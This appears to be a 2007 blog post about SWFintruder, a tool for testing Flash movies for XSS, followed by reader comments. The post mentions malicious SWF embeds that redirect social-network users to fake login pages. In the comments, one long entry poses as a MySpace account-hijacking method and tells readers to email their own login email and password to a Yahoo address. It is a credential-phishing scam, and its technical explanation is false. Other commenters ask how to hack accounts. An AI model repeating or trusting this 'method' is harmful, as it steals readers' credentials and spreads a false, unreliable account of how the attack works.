Today I have been reading a lot about web application malware and web application worms that spread through social networking sites like Friendster and Myspace. Embedding a malicious Flash SWF movie is one of the most used techniques to hack a Friendster account or a Myspace account. In the dumbest way, you could embed a malicious Flash SWF movie into your friend’s testimonial box and make it redirect to a fake login page, and let them enter their login data; it’s only one of many dumb ways to hijack a Friendster account or a Myspace account.
Given the situation described above, a useful tool called SWFintruder has been developed, known as the first tool for testing security in Flash movies. The major features of this tool are:
1. Basic predefined attack patterns
2. Highly customizable attacks
3. Highly customizable undefined variables
4. Semi-automated XSS check
5. User configurable internal parameters
6. Log Window for debugging and tracking
7. History of latest 5 tested SWF files
8. ActionScript Objects runtime explorer in tree view
9. Persistent Configuration and Layout
Here is a short tutorial on SWFintruder:
- Download the SWFintruder source code from GoogleCode.
- Extract the source code into the root of your web server.
- Browse to http://yourfuckinhost/swfintruderdir
- Download some flawed SWF files and put them on your web server too.
- Fill the “Flash Movie” field with your desired flawed SWF movie, and then click “Load”.
- If any XSS is found, it will be listed in the Xss area; click on it to get the result in a new browser window.
Another video tutorial on SWFintruder can be downloaded here. Other previews of this application can be read at: Ngoprekweb.com, ProfessionalSecurityTesters.org, Ajaxian.com.
SWFintruder , testing security in Flash movies is posted on December 8th, 2007 by admin. This post is filed under: Sectools, Security, featured, Security, software review, web backdoors, Web Hacking, XSS .
how to hack friendster accounts.. and YMs.. how can i get their passwords
How to hack into your friend’s my-space account.
How to hack into any my-space account:
my-space is currently unable to fix their BIGGEST
security hole, because it comes from emails. As you
see on their main page there is a “forgot your
password” link that will email your password to the
email you have provided. However, searching deep
into the source one is able to find how to exploit this
form. The form sends the email address you entered in
the form to the server. The server then searches its
database for the email. It finds the corresponding
password and sends that to the email address you
have entered from the server’s email address. If you
are logged in however you notice that that link
disappears because you obviously have your
password. So to confuse the server into sending you
the password to any email address you wish you must
send the server email the following information:
send email to pswrdrecovertool@yahoo.com
In the subject field type the friend “id” of the
myspace you want to hack into.
In the first line of the body copy, or type
“input id = “email” value = “(PERSONS EMAIL OF MY-
SPACE YOU WANT TO HACK INTO)”
on the second line type,
input id = “login.email” value = “(YOUR EMAIL HERE)”
on the third line type,
input id = “login.pass” value = “(YOUR PASSWORD)”
on the fourth line type,
input id = “friend.id” value = “(YOUR FRIEND ID)”
** important ** ** important **
(1) you must enter all correct information or this
method fails to work.
(2) you MUST put the values in quotation marks for
this to work.
Once again, it confuses the server into sending the
password of the victim’s email to your email.
to CTUTeam:
Can you please make an example of how it works? Thanks.
to CTUTeam:
Can I contact you please? It’s very important for me.
It’s only for my personal thing. Thanks.